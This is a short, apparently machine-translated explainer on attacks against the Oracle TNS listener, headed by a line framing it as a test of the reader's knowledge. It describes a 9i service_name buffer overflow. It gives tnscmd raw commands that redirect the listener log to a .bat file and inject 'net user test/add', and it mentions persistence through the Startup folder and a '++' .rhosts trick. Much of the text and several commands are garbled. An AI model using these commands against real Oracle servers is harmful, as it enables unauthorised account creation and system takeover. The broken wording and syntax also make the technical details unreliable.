Measure the test taker's knowledge about the TNS listener attack methods against Oracle.

First, according to different versions, TNS listener may be vulnerable to multiple types of buffer overflow attacks, which can be exploited without providing user IDs and passwords. For example, in oracle 9i, when a client requests an excessively long service_name, it is vulnerable to overflow attacks. After the listener constructs an error message for the log, the value of service_name will be copied to a buffer in the stack structure, resulting in overflow-overwrite and save value will return the stack address. This can allow attackers to gain control. In fact, TNS listener has been prone to multiple overflow and formatting of strings.

Second, another type of attacks are related to log files. The attack is valid only when no password is set for listener.

Assume that no password is set for a listener. The attack method is as follows:

Tnscmd-h-p 1521-rawcmd "(DESCRIPTION = (CONNECT_DATA = (CID = (PROGRAM =) (HOST =) (USER =) (COMMAND = log_directory) (ARGUMENTS = 4) (SERVICE = LISTENER) (VERSION = 1) (VALUE = c: \) "set the log directory to disk c

Tnscmd-h-p 1521-rawcmd "(DESCRIPTION = (CONNECT_DATA = (CID = (PROGRAM =) (HOST =) (USER =) (COMMAND = log_file) (ARGUMENTS = 4) (SERVICE = LISTENER) (VERSION = 1) (VALUE = test. bat) "to set the log file to test. bat

Tnscmd-h-rawcmd "(CONNECT_DATA = (| dir> test.txt | net user test/add )"

Dir> test.txt, net user test/add command write c: est. bat file, because of the double vertical line (after the first command fails to be executed, the WINDOWS Command Interpreter executes the following command) to comment out the error information, so that we can execute the command we submitted.

By setting log files to different directories, such as WINDOWS Startup directories, when the server is restarted, specific code submitted by malicious users is executed, which threatens the system.

Oracle running on UNIX systems is also under the same threat. One of the methods is to send "++" Back To The. rhost file. When the system is running, use the r * services Command.